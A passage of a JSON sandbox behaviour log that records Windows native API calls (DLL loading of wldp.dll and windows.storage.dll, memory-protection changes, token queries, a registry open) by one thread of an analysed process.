            "api": "NtOpenSection",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "Wldp.dll"
              }
            ],
            "repeated": 0,
            "id": 432
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000264"
              }
            ],
            "repeated": 0,
            "id": 433
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000260"
              }
            ],
            "repeated": 0,
            "id": 434
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Temp\\Wldp.dll"
              }
            ],
            "repeated": 0,
            "id": 435
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wldp.dll"
              }
            ],
            "repeated": 0,
            "id": 436
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000258"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wldp.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 437
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000025c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d",
                "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000258"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wldp.dll"
              }
            ],
            "repeated": 0,
            "id": 438
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000025c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0002d000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 439
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0529000"
              },
              {
                "name": "ModuleName",
                "value": "Wldp.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 440
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0519000"
              },
              {
                "name": "ModuleName",
                "value": "Wldp.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 441
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000025c"
              }
            ],
            "repeated": 0,
            "id": 442
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              }
            ],
            "repeated": 0,
            "id": 443
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf281000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00002000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 444
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "35"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 445
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0519000"
              },
              {
                "name": "ModuleName",
                "value": "Wldp.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 446
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\Wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 447
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\windows.storage"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedec70000"
              }
            ],
            "repeated": 0,
            "id": 448
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "api-ms-win-eventing-provider-l1-1-0.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1090000"
              }
            ],
            "repeated": 0,
            "id": 449
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNELBASE.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1090000"
              },
              {
                "name": "FunctionName",
                "value": "EventSetInformation"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34b2af0"
              }
            ],
            "repeated": 0,
            "id": 450
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\wldp"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffee0503200"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 451
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "api-ms-win-core-synch-l1-2-0.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1090000"
              }
            ],
            "repeated": 0,
            "id": 452
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNELBASE.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1090000"
              },
              {
                "name": "FunctionName",
                "value": "InitializeConditionVariable"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34d9f40"
              }
            ],
            "repeated": 0,
            "id": 453
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNELBASE.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1090000"
              },
              {
                "name": "FunctionName",
                "value": "SleepConditionVariableCS"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee1103890"
              }
            ],
            "repeated": 0,
            "id": 454
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNELBASE.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1090000"
              },
              {
                "name": "FunctionName",
                "value": "WakeAllConditionVariable"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34c5430"
              }
            ],
            "repeated": 0,
            "id": 455
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 456
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 457
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              }
            ],
            "repeated": 0,
            "id": 458
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlDllShutdownInProgress"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34d3410"
              }
            ],
            "repeated": 0,
            "id": 459
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\windows.storage"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedec70000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffedee292f0"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 460
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2a57000"
              },
              {
                "name": "ModuleName",
                "value": "SHELL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 461
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2a57000"
              },
              {
                "name": "ModuleName",
                "value": "SHELL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 462
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 463
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 464
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtOpenSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000028c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000006"
              },
              {
                "name": "ObjectAttributes",
                "value": "windows_shell_global_counters"
              }
            ],
            "repeated": 0,
            "id": 465
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000028c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00870000"
              },
              {
                "name": "SectionOffset",
                "value": "0x007fe060"
              },
              {
                "name": "ViewSize",
                "value": "0x00001000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 466
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 467
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 468
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 469
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 470
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
                "name": "TokenInformation",
                "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 471
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              },
              {
                "name": "Handle",
                "value": "0x00000294"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              }
            ],
            "repeated": 0,
            "id": 472
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 473
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 474
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
